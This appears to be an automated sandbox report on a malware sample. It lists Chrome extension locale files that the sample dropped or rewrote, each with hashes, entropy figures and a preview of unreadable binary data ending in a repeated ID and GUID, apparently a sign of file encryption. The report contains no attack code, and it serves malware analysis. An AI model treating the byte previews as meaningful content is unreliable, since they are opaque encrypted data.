                                                                                                                                                                                                    Preview: Y.x...x..P....R.$Y.xz....{;:...`....9..t......^..+.t.....T.+.'ZE......:..~3HSzC.ms0.....C0...d..#.mMz.4..NaG......=......!.....3p....t..A..h.-.N...Bd*.....d.>.~YO....I...i,Y..>.......:P.;..e.J.;...[.&..}.z.[.u....g..$....b...d9a..@.)......|.!...|~......R!7.>.-.[.....8.A.F...Xbc"C..o...`$V*}."<=..$...y]q...{iH..[1vO.a........}.....9...Z....3F....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\nl\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):462
                                                                                                                                                                                                    Entropy (8bit):7.421450032200507
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:y4RzdosthScY9DPNzZiduDtVPS9y2zXcii9a:ypiAcYBPNzZiduDtVPQy2jbD
                                                                                                                                                                                                    MD5:FC47A57B59FC6972D47ACA2303E9AF94
                                                                                                                                                                                                    SHA1:254373006B220A2FB511C01BB689AF07428A77DD
                                                                                                                                                                                                    SHA-256:CB8F8B066D0B729B94D62AED92DB4AF2082FBE5EE434F69ABCA377DCADF6250B
                                                                                                                                                                                                    SHA-512:75C3DA448CDD85614BB90315DD5883FA64E45910344C44054C93DCF07093B04D614FEB1D069B30D333DA78359A19F5C1296B135EF4ADCC252720CA2CE6D417ED
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: kW{..,.*U.'..o./2....(-...f."...)..+.u......@9..%..=.M.....rz..]<..@....D...Wqo[0.X.-L..ND...F..js..7.L.e5.v.)..`...8.fR%y..q..e;..b.is.#.fdbY}(:.i../-$..B.,.ZyE$R.J..y...C.....A..6...R..C..9:.6b.........Q....x......E..i....%1.^..}....a....(./.\.i.W..w.Dp.6...i..ZMv...=..0..g.%.)....qb.y../E..B.f.z.g@.X}...t.y(..M.v.G8D%.,1}z......Q...`K.i....dK.....a..?...i..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\no\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):420
                                                                                                                                                                                                    Entropy (8bit):7.343834796436374
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:GOEejHdFUFB2sImB2Y/CtIcws2eiQSqTP2rH+iK+aKazB3QiR/xFL0kyUrV75dEJ:GVSkXlIFYhXETP2/+zRZzyUr+cii9a
                                                                                                                                                                                                    MD5:616BC482C3DDDABBB97892B610299C85
                                                                                                                                                                                                    SHA1:AA91D258832797D8DB367FE51A1FD4C4246FFCBC
                                                                                                                                                                                                    SHA-256:69533F5C7CEC26C05EE13E093A785E0878F6A2D26051EC64CC936FDC8ADCF3F6
                                                                                                                                                                                                    SHA-512:C4707FE474B78007DCFFBC443F11FE5388B1656F8D89248E38A156F4D330466942F5956A721B57F1AA97216B5E753864DE2C400D7861F58AB20FB6B1EF46B837
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .V....6.]5..fr+2...M.(.J-r....CV.....l.`..e.....@.7..0~6x.A...u/...q.3..Y+Z+4...%..WH.*D}....\O.8W.....J.s.-.......h.7.......#..W...$.......1U./.U>Cbz.....@!.,...Ghx<...y.E{'....K.+C.j...".(..J.VM.U...=..*:".w.-R}A.C.z^9u..Y.[...K......~.7.Q..:...}.....&.9......H'X...f.>.2c...UY.:..D.-[Xk.~.7{..(.r...>.#F........MB..s......5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pl\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):467
                                                                                                                                                                                                    Entropy (8bit):7.486125795637481
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:zPYPJ7elWnJUtvspO1pTUn49RvmDUcii9a:jYxKOya43vEUbD
                                                                                                                                                                                                    MD5:5B42856FDAA7B2B8B7073F499E237331
                                                                                                                                                                                                    SHA1:10705709C9C92CC260078B95EBCF9AF5F7FCF3CC
                                                                                                                                                                                                    SHA-256:206F7CFC33E3A3912C9C72F5854F4374A34D32DEB71536C7A79422954093BA6C
                                                                                                                                                                                                    SHA-512:9C5DCF2A73357FEB8332606ED98B88A3CCF0A7F9AFB1A019A45D11474459FDE2A1DB136F53FC420145560E384AAE39C98FBD86827778284D870829D52BD12F31
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .r..A......MO.z.x.t;.......44X.[f..j.....TG...n.....F.%..T..V..._..P.c.....w.}4..^....%..<$......{`9%B..S.JO...l._.Vv...u..oQe`Z0.`I...5..3.M ........=....K..c....u\U.b7.sl.../..I...5...2.:....#..%."....'..s....U.:.../My.LW.3.h".'Z.....p.#%.w..^[&......%..=2.."..`a.c..R.L..*.3%.C..n.w$.g..'..9.y(w1pH&..h....{l.p:BZ....Yb;"...1)3..X...$...|..1Z....Ni.....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_BR\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):457
                                                                                                                                                                                                    Entropy (8bit):7.385999672341231
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:briYHBbUSxlebuq+0eewCEVbUCmr9CbdJcii9a:bBHBYSxp5ZCEVbUCUidJbD
                                                                                                                                                                                                    MD5:66967F316D8CC4B7DC4596EAB260F9FA
                                                                                                                                                                                                    SHA1:806F946FC9D3EAE3E96668886CAEC007FE869000
                                                                                                                                                                                                    SHA-256:DCCA449CB87019B5F3234526347624FA54BE69148F891A6B016628F5A2FAE872
                                                                                                                                                                                                    SHA-512:9E3F25E1E62CF70AF22AEE35CE394DE012FC4CE27211643FF7A218116CB2B3BA03A47DC5AE93104574E93AADC63100DA8DF90192F8BE70F7C186D11C04070C64
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: G.f.4.x.[6.{v..9i.+.#......f.q.7/iV%.(VC1....T...>........2.i..JL!..d,...E.....cxZC...x..~..6....V...R.!.Y.J...4.S....K.w...}.....y...}..5...CV.......t..S....Y......8...?...e.1..FBs...{..."..^./,.Y...LO..4.9.[C..I....T........o5y....].w*e....T.....VdXA.@"'...kh2E.% b.%...:A....../v.[...b.....s....Cs.......8..GY.s...K...5.....o.k.Z.......7.S..t..u...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_PT\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):459
                                                                                                                                                                                                    Entropy (8bit):7.43293057392039
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:fBxerUHJvttA/d0Rf/lSTzhlFh+GjAUcii9a:f+rmJvtMdQnlSTzzjVbD
                                                                                                                                                                                                    MD5:2B5BD14A0ED2FEC0F39BCA6A5D44D0A0
                                                                                                                                                                                                    SHA1:A1ECBA5C60144D582D4EE20397E88E385B009829
                                                                                                                                                                                                    SHA-256:FB95F3EFF8809B038A95A84312C314E4B043A109AF7D5942A54408302026B7C3
                                                                                                                                                                                                    SHA-512:47E24C4ED7C5464ACD5D7AEFFD5D66053917E6E3327BDE8B8785FE5738608B4BF81EEFBD0690269F62F58BDA1F01512D8B63099C6A35E7297EE6C9C54D5665F6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: |Z.u.h.[".X.~..4...(...F./..:....0..CT....G7m.|.b.....2.0.Z.p{.Y'.$?JG.6.7..!9`...Q........p.......LR...|.'... ...R./....:...J..n..w...Ws..n.2"..kOCaR..i.YM.....-.W{u5....mx9^.D.E7u.%$..i=.......v.....s.S42..@.........K.....i..Xzs.T.k......pV.........a.;..T..A......3...c!..69..k._...'....^y..?.y....t....L...Tr..ax.)lh..j.K.....7.C....O.>......6..%.....^5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ro\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):463
                                                                                                                                                                                                    Entropy (8bit):7.444587183840579
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:T7/NigjPyeGhFmDa5LpwUG1sPDhZYncii9a:T7tbyxhFmUI1sP0nbD
                                                                                                                                                                                                    MD5:BF38C745EFB728C136AC0306DEDC453C
                                                                                                                                                                                                    SHA1:02D1A9F75C773BCFECD808E55594179189EDE1A9
                                                                                                                                                                                                    SHA-256:423C7ED0C06D63635B293F6BB840323032AC76EBA656C939302D7ADB82912BC5
                                                                                                                                                                                                    SHA-512:C1CC285053291B8CA1A7E3158F523CD253C989D3263733E8FBADB1CDB18233C6A8FEEE8F0E7B0B14C333896171AED015BB746E2C7C33058064DD8D7992022F47
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...p..i.}...(xvw8.#z&5PNA..v....:Z......3...$......lK......i.J...).-.0..g......B.G%J.....n:.g.r..=4....p...O..I....9...._....o....Z.....N.2..6W...@..N...0..yE.L."B.#...U....N..../..jaK~.A....P<..\%.....1...)*.P.D..X...S...W.I.(.w=....E.+.UB.b.c.4..q.QW.#.x.yU.`.{.c...+...p].e...F.9zl.<......p....\P.rO...?lW:.9.ix.....&.gZ4...A?.d.'2)Q.0.^.;.......Z..MJ.R.....h.T.Z5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ru\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):510
                                                                                                                                                                                                    Entropy (8bit):7.510395945090099
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12://FiMROHp4gEuIC5WFPeF5VBOYUuUcii9a://FiMR6A659IFbD
                                                                                                                                                                                                    MD5:03FF86E640EA089B9A51213534F9ABF9
                                                                                                                                                                                                    SHA1:ECBE53DAE52DE97C286A60472954C227C0986C94
                                                                                                                                                                                                    SHA-256:E042F4E919A3517C5ACB05A75B1A1E24CB0AA0DED1D94B98539F44E2952328C3
                                                                                                                                                                                                    SHA-512:FD3E3715533A0FAF1A17B923C5ECA37F7F0A36641C196C95BA7ABDD40DEDE3F0C4F3C45B0AA560F383FE575BF2412093D413E879C5EBE8A51D19AAEDAAE2003C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: X!..KO...D...........me0..A.a..8...q..N.B&..N..1.4....j...DJ7#....8........B.I....../0.0.zZ......p.e...._s....!~../r6.^.........8..V6.@y.b.:..E...8..0_.....<TZ..........~...D..9...MVS.eI.-..%.... .M...)..w..$y&5..5.0.)...us.s....-'..O#$.Z..0..\..w.0.....K..~g..[..z..w..X$.']...@.,.....c.J%......P....;....p.......=.....m.._J...A..t..-O<.&....y..Y.h.k......?.R.zm......]Y.3N....4.DM..->.3...N..%.B^h5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sk\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):466
                                                                                                                                                                                                    Entropy (8bit):7.483141048106686
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Dy6UgYwlflnVRRdbjWX9AGCe9jb0s6ao3nwgLLxQwcii9a:u6UgY6flnVvZqXpCvs6a/gL1PbD
                                                                                                                                                                                                    MD5:C5429DFCE11C3FA263DBAA0641DD1D9A
                                                                                                                                                                                                    SHA1:F778303EEDC82D488C606D90111F5E9C0A83C060
                                                                                                                                                                                                    SHA-256:81667744D7B883DA68168F5D4854B6E406D14086D3239D7D1B7AFBF789BF16FD
                                                                                                                                                                                                    SHA-512:A4DA813DF7FF3BDF5E8C50EBEB07EEE0D03C53F55ABC59B448F7545D4884192461DC8F569279B5C33075B9C6A24AA11A00D2C04C4C25B0B8B5EBBEB54B1D1790
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .%l..;h.nW e..{..\.}.m.?.:F...A........3....jO...?.Kb....s..>..R.......P...F.8.*....@Y.9._f...f..[.q..\_./.....\{b..]....S5 c..~.1..ZO.c......F....$S-.....T.RE`.B.=.q.....G.C...W.._v...f.d-...J....8.......1J.......].].........6UB...].........Z....v...X.OgGIH....Fu&/0..H.....;...`..,....y...o......f..|...~=~>.6.t..b6.1..d(.,o.k....T...#Sh.0....#......r.}.,...5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sl\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):471
                                                                                                                                                                                                    Entropy (8bit):7.427845955335781
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:OyrJXdbi2sk+pE8qUSHn34ufX0h2G7cii9a:v9dbii8SoWmbD
                                                                                                                                                                                                    MD5:BB7D30EDD0336AB74118F7D0FC48FBA5
                                                                                                                                                                                                    SHA1:DFD63093B5CCD16B97267E50880209C70020770D
                                                                                                                                                                                                    SHA-256:F0112EF782010E6387BE2E60B5149E440FF731D7AAB65CB07A0DF29FE7F1BC15
                                                                                                                                                                                                    SHA-512:29A781447FBBE667C9855E9F7E3F0D9255A52871C8CDDB9F6BF401D7361C24646B2E0DCA41F6B45EE6CE178CB93C61D40AE3125B416FAA1AF3DE29C045490368
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .#.U.*6.R./..[`.a.2 ...+..B.H_e...f.ISs.Ph.g@.......^\.^A;S.)...c.....D<.Z.T....C..n%^.xQ...8+....eKD.C23C._h+..~..p.7L..#2...y..B...e...u[o.N.ny..W...6....C.Dj&.^.....K$W.3D.B..f...|x..n.....c.C..O'&b..K..F..^`..y...r.......J,d'V.Q.....s.Vp.....a>nLl...j...\.Q,{...u..%.W...j.p4,..r...?...2...i.....z.}..(r..>s....ut.n..u4."R..u.{G:T.. .K.BB.Bp.5.p....#^......5.e.I......b....15VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sr\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):516
                                                                                                                                                                                                    Entropy (8bit):7.540788342323116
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:sHOArCeBsKVH3eU0ZN6oDqp0ZMEijwhaWqUTtheuNZO5cii9a:XAJrodSEqUaJUZheuNSbD
                                                                                                                                                                                                    MD5:E9F31EB6A7C9881F7BE4A3183AB139F3
                                                                                                                                                                                                    SHA1:579A8DD3A9B66461DAF76AB40DAA8B1A56E07F07
                                                                                                                                                                                                    SHA-256:681D84DFE13AEECA89B1D7E781D1E164969CDF4EB80019D56AABEE3337F08EEF
                                                                                                                                                                                                    SHA-512:0345F733914747AE12AD883352EBD87335825B689C3FBCF996FF8F2632A1816B4D3508E353057EC05671AD457819592393460A3DD55161A903276738B439705A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ......B'm:.[\i.{Z.j.m.#?...L'GF.4.%.MI....|.Q<I..h6...)..K....c..#.@..wXJ......x...k.;..$D.S..(**..n`.0u.7.T.4.o...>wt....Q...fM.B.C.<..^.s.......$..."....P1...h..~..... G....$:.l#Z..ytm<G`..u.#....A.aWG..!*..(.{z.g.M...S....E.....gD^.[._..y.bjh{.......0..BD..F.J..y..x".........OW...O...?OEfd.......s8.:....d.E..^..1..Z.0~.`...M%....:..gq.8..h.Cm.Xz9. .}e...%....+# =..F.*.i.....b*^.e.M>.s.....A..z...Mt6..sGv...@..K..=ta5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\sv\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):459
                                                                                                                                                                                                    Entropy (8bit):7.5048028773344395
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:6BoNsc/Yxa8jpZeUWoqrQiG8hSh0IU0+aG9Je7cii9a:coNmoySoG10h0IU0+aG9JwbD
                                                                                                                                                                                                    MD5:1A1A6BC50C2B9FB38F49490420DBB0F8
                                                                                                                                                                                                    SHA1:9E8F50B4CB156B4D6F8901CC79D98FEB4F546924
                                                                                                                                                                                                    SHA-256:F763F23ED0D304ECA0A3FBBFAB8F5C6FE5F4B9E63DDC5B367444E9B01C6783C6
                                                                                                                                                                                                    SHA-512:3DB1D920D6390A0300AF116906DA75F286E8BD6B59A9A35BD1C3DA27E8FCC2C6BFC6E75CD9CB5D6B152FD70B0CF3F086FC2ACAC4CEB44CAF18B818DE1DDA12C8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Z.d..aO.\.......s..la.Zip_...}.U..c:.O.....M).,E.Y`..pi..9...u..4#..&..IU.Q?..........Q.tJ..E...N+W.$Z..P...|P./.~.m.N....4.....c..}.^..\.=..X..@..U.'..F.....3...-...>...m..C..<....y.T...}...|~.w..d."/......l.0.,.. (-..>K.p...F...e...5.h..j...-.4.....IJx.z......@4jl~.......@..."........!..##uIR).c/..........7.$..m..J..C".bE.W.........B...`..`..<OOb...[....)[5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\th\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:COM executable for DOS
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):499
                                                                                                                                                                                                    Entropy (8bit):7.49805315783874
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:PsMsgqNB6Fbc3HjlxR3IIXzPgVeAGScii9a:PvsdswThTXzWGSbD
                                                                                                                                                                                                    MD5:BAF663C1108578E3DCCF7BA620EF1F3B
                                                                                                                                                                                                    SHA1:70810FDDD200C4F78E55FAF7E85A3C3754951A1B
                                                                                                                                                                                                    SHA-256:1C7181F85B75F2D9D8663B417F723927A069A12382B8D4532887574CF980B39A
                                                                                                                                                                                                    SHA-512:DFE550903FBF3242AC70B2966D6CB64FCA7C92AF9D38E74401DA0053EF561752CAEA67BC7D437CBCA002F6F0A9D90F73435562062054F6E1D13845ABA3E6A1D2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..p...q6V_.K..\..v\.kv.e.;....n.z...T.7...iT..=.*..#..Ov`,..`((g...s.&...S.!pY...:..:@. .xk01.e../l.@.L8j.Kt.z...}.k"..c..K....jv..T..g[....m.t.z..':[C=.>.AG g\..A...Q0..kb=....;..N.W1.4.....r.._...+..[.z...^.r+......:6...._.i28.....?.(.2......HFp...#.F.i*....r..ABP.].g=....._V..\......h.s,<}..}.y...V5*..b..{NF-.r..Y...bC{....U6...p..&GPCg...-|)..^k...3-.g...oY...'..{.S...A.b._..qF...vv.[I?.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\tr\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):472
                                                                                                                                                                                                    Entropy (8bit):7.462484516865995
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:se/9hUI7Z6G1fS6TdHXiIdYYDqHjcii9a:r/9CI7Z7fS83iI36jbD
                                                                                                                                                                                                    MD5:82E342F4C2FB7AC122F73BD7EE316B3B
                                                                                                                                                                                                    SHA1:0C45657DA95C18A936D1C84ED939029EACB1CD4E
                                                                                                                                                                                                    SHA-256:F5ED7939D25D0911F6225A73A19946412925C3749F801D6CF1FEA14F975F30BE
                                                                                                                                                                                                    SHA-512:97F9F8D7AB8C408DE04EB14C0E7FA0A5E2688CC36ED2C7D9234A91582A1D2ED5524AC786BE64C11E25A2BA27A13BB101A3BBB3BD194553EB9B0FCE9C8C151481
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...L.C.v...:R...k.?s.;.9.PS.1.8Q..j ..w..>....0..]....r8...O.*../..[.|Z3i^..+7f ..x....q......B...JG&|ix.g.w-..(.......Gw.J.US..s.R.5..Y...`{....im#/\.c..C.l..PsX....N.D.y......&..hT....6..N[.`..M...........sL..d1.^....7...(...p.J....By;.u..G........-.o.Luym....x......`. .>R..Lz.j.$4.~..J^.........k..9e..i.G.43.a.,Wo.v.0?A$.\v.|.[u.....i....}..].....).J....3.n..Ub.V...Nh.....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\uk\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):507
                                                                                                                                                                                                    Entropy (8bit):7.561437365232241
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:1G44hUqrVVvhW3yXO/dzFNEL3g2OApHhp2Ucii9a:1Gv6YV5hey63NETg2OApeUbD
                                                                                                                                                                                                    MD5:16A733949DD2819E9DDCD52A91E0CD1F
                                                                                                                                                                                                    SHA1:71AB5A4D64C7CD8B572E6129238D11034478BBF2
                                                                                                                                                                                                    SHA-256:8D108494C587A841D697DEB5D094B4829444712F35B02E29BC7BA803275B2258
                                                                                                                                                                                                    SHA-512:BA20B4B63B5BDC9F7007D2A91DFD6CAA35E0B5691D5E2379B45EA4ADBA6A6E1685CBE8545A0AAC6DC01CC6DB3A7136393E0F331EFAFEC17E9135BEEB3A43D6BF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...........*{.v..a.b...4.......tZ.ZA...U. ...{p...*0...=..%3Y.eO.f...{.2K.I.0.. .YwO...Iz..K.6..[.....b.qD..!..T...h.3.m"....1Q.r........../G.zl......o......m....~...gIJ.pJ.].pY..l...'......Y.6&.2.m..4..%.$..S..L.b?..i.\./+...V._M.Uo..U..0.......2.*..i..`.^....!.................u>..t+..lN...j...K.MBB.L.y.^..spG.X}.rp..~2e......b^(.....<.".c..*O.p*.r.O..N,...O}B......x..HU...,......h...r.z..Er......8.......5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\vi\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):470
                                                                                                                                                                                                    Entropy (8bit):7.360112658196176
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:PmImk4x9E1qLCh4Dw7Nk912MpOktm1r6crAC7+Pcii9a:PdJl4EZ0C91mcsCsbD
                                                                                                                                                                                                    MD5:8D0BA9CD93891655B925B68A180F6E6B
                                                                                                                                                                                                    SHA1:9FB6E44F16576C388DB08ED3850DDE85783EC38A
                                                                                                                                                                                                    SHA-256:8103199241D940297B29907FC1AAF5800E67695B7B3AD358975D2233A34EBD44
                                                                                                                                                                                                    SHA-512:5589097DE9E9DA70BAA388809471747D242EFF761B75B70C61A04AF912FBA9C214FEB642AE4192F9F506A15F2310B130F3186A7C07883DC5AAD9A984CFB9EBAF
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: %..a+o..+..%/..I..n..AIV.A5.....I."M...oW.Qy...f..=..@*m.^BZ..O.....].....R....i....5.G.M.]..Be....h...".g..nv.7K..W.XVw8.P\....S.."..l+O....Y@I...Q.B.e..O5:....5...+...[...e\..n..)x)_lr...@."/..-....J]o.v..&.._.F.8._G.....PoZ#4./..1M3...5...@8..e4......Rg...'.hey.t...$...~#.L@..2..0.B{.Oz@.a..8+6-...SY.G...H.(Q...9II.P.4...f.).....l\..7..a..k.O...1Hv;.}.V.=..>9..@m?.e.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\zh_CN\messages.json
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):451
                                                                                                                                                                                                    Entropy (8bit):7.432714946316886
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:gKQxYs6m/nkiAVxgcJL2561xbKRJeRGVHOpocii9a:B2Yu/nQRGIeqFobD
